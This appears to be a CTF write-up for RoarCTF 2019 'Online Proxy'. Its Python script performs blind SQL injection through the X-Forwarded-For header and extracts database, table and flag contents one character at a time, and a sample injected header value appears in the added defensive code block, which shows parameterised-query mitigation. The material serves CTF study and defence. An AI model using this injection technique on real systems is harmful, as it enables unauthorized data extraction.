  • [RoarCTF 2019]Online Proxy

    This one was absolutely sickening 111

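    import requests

    url = "http://node3.buuoj.cn:27220/"

    def exe_sql(sql_str):
        """Recover the result of sql_str one character at a time (boolean-based blind)."""
        result = ""
        i = 0
        while True:
            # Binary search over the printable ASCII range for character i
            head = 32
            tail = 127
            i += 1
            while head < tail:
                mid = (head + tail) >> 1
                payload = "0'or ascii(substr(("+sql_str+"),%d,1))>%d or '0" % (i, mid)
                headers = {"X-Forwarded-For": payload}
                headers1 = {"X-Forwarded-For": "233"}
                # Fresh session per probe: one request carrying the payload,
                # then two requests with a plain header value
                s = requests.Session()
                r = s.get(url, headers=headers)
                r = s.get(url, headers=headers1)
                r = s.get(url, headers=headers1)
                # "Last Ip: 1 " in the third response means the condition was true
                if "Last Ip: 1 " in r.text:
                    head = mid + 1
                else:
                    tail = mid
            if head != 32:
                result += chr(head)
                print(result)
            else:
                # Nothing above the lower bound at this position: end of the result
                break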
    			
    #exe_sql("select database()")#ctf
    #exe_sql("select group_concat(schema_name) from information_schema.schemata")#F4l9_D4t4B45e
    
    #exe_sql("select group_concat(table_name) from information_schema.tables where table_schema=database()") #ip_log
    
    #exe_sql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'")#F4l9_t4b1e
    #exe_sql("select group_concat(column_name) from information_schema.columns where table_schema='F4l9_D4t4B45e' and table_name='F4l9_t4b1e'")#
    exe_sql("select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e")#F4l9_C01uMn
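
The defensive counterpart to the script above, as an added example that is not part of the original post or the challenge's code: it validates `X-Forwarded-For` as an IP literal and only ever binds it as a query parameter. It assumes the server stores the header value in the `ip_log` table and reads it back on a later request; the column names, the `session` key and the use of sqlite3 are assumptions made for illustration.

```python
import ipaddress
import sqlite3

# Constructed sample: the header value shape sent by the script above.
SAMPLE_PAYLOAD = "0'or ascii(substr((select database()),1,1))>79 or '0"

def parse_forwarded_ip(header_value):
    """Return the first X-Forwarded-For entry as a canonical IP string, or None."""
    first = (header_value or "").split(",")[0].strip()
    try:
        return str(ipaddress.ip_address(first))
    except ValueError:
        return None  # not an IP literal: it never reaches the database

def open_log():
    """In-memory stand-in for the ip_log table (column names are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ip_log (id INTEGER PRIMARY KEY, session TEXT, ip TEXT)")
    return db

def last_ip(db, session):
    """Read the most recently stored IP for a session using a bound parameter."""
    row = db.execute(
        "SELECT ip FROM ip_log WHERE session = ? ORDER BY id DESC LIMIT 1",
        (session,),
    ).fetchone()
    return row[0] if row else None

def handle_request(db, session, header_value):
    """Return (accepted, previous_ip); header data is validated, then bound."""
    ip = parse_forwarded_ip(header_value)
    if ip is None:
        return False, last_ip(db, session)
    previous = last_ip(db, session)
    # The stored value is data only: both the write and any later read use
    # placeholders, so it is never concatenated into SQL text.
    db.execute("INSERT INTO ip_log (session, ip) VALUES (?, ?)", (session, ip))
    return True, previous

if __name__ == "__main__":
    db = open_log()
    for value in ("203.0.113.7", SAMPLE_PAYLOAD, "233", "198.51.100.9, 10.0.0.1"):
        print(repr(value), handle_request(db, "s1", value))
```
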
    
    


  • Original article: https://www.cnblogs.com/h3zh1/p/13443753.html